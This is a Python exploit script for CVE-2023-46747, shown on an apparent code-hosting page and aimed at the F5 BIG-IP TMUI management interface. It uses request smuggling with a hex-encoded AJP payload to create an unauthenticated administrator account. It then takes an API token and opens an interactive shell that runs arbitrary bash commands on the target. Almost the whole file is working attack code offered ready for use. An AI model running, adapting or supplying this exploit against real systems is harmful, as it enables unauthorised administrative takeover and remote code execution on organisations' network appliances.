-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
110 lines (100 loc) · 5.01 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import argparse
import binascii
import json
import random
import time
import urllib3
import requests
urllib3.disable_warnings()
def generatesth(num):
charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
return ''.join(random.choice(charset) for _ in range(num))
def unauth_create_user(target, username, password, proxy):
login_request_hex = "0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d" + binascii.hexlify(username.encode()).decode() + "266e616d655f6265666f72653d267061737377643d" + binascii.hexlify(password.encode()).decode() + "267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00"
login_data = b"204\r\n" + binascii.unhexlify(login_request_hex) + b"\r\n0\r\n\r\n"
url = f"{target}/tmui/login.jsp"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Transfer-Encoding": "chunked, chunked"
}
resp = requests.post(url=url, headers=headers, data=login_data, verify=False, proxies=proxy)
time.sleep(5)
if resp.status_code == 200:
return True
else:
return False
def get_token(target, user, passwd, proxy):
url = f"{target}/mgmt/shared/authn/login"
headers = {
"Content-Type": "application/json"
}
target_json = {
"username": user,
"password": passwd
}
resp = requests.post(url=url, headers=headers, json=target_json, verify=False, proxies=proxy)
time.sleep(5)
if resp.status_code == 200:
return json.loads(resp.content.decode())["token"]["token"]
else:
return ""
def exec_command(target, token, cmd, proxy):
url = f"{target}/mgmt/tm/util/bash"
headers = {
"X-F5-Auth-Token": token
}
cmd_json = {
"command": "run",
"utilCmdArgs": f"-c \"{cmd}\""
}
resp = requests.post(url=url, headers=headers, json=cmd_json, verify=False, proxies=proxy)
if resp.status_code == 200:
return json.loads(resp.content.decode())["commandResult"].replace("\\n", "")
else:
return ""
def exploit(t, proxy):
u = generatesth(5)
p = generatesth(12)
print(f"\033[94m[*] start to attack: {t}\033[0m")
if unauth_create_user(t, u, p, proxy):
token = get_token(t, u, p, proxy)
if token != "":
print(f"\033[92m[+] username: [{u}], password: [{p}], token: [{token}].\033[0m")
print("\033[94m[*] start executing commands freely~\033[0m")
time.sleep(2)
while True:
c = input("CVE-2023-46747-RCE@W01fh4cler# ")
if c != "":
result = exec_command(t, token, c, proxy)
if result != "":
print(result)
else:
print(f"\033[91m[-] username: [{u}], password: [{p}], command: [{c}], token: [{token}]. The command [{c}] failed to execute, Please try again!\033[0m")
else:
continue
else:
print(f"\033[91m[-] username: [{u}], password: [{p}]. Failed to obtain token!\033[0m")
if __name__ == "__main__":
banner = """
______ _______ ____ ___ ____ _____ _ _ __ _____ _ _ _____
/ ___\ \ / / ____| |___ \ / _ \___ \|___ / | || | / /|___ | || |___ |
| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____| || |_| '_ \ / /| || |_ / /
| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__ _| (_) / / |__ _/ /
\____| \_/ |_____| |_____|\___/_____|____/ |_| \___/_/ |_|/_/
"""
parser = argparse.ArgumentParser(description="F5 BIG-IP TMUI remote code execution vulnerability CVE-2023-46747 ",add_help="eg: python exploit.py -u https://192.168.149.150:8443")
parser.add_argument("-u", "--url", help="target URL")
parser.add_argument("-t", "--proxy", help="proxy, eg: http://127.0.0.1:7890")
args = parser.parse_args()
if args.url.endswith("/"):
url = args.url[:-1]
else:
url = args.url
if args.proxy:
proxy = {
'http': args.proxy,
'https': args.proxy
}
else:
proxy = {}
exploit(url, proxy)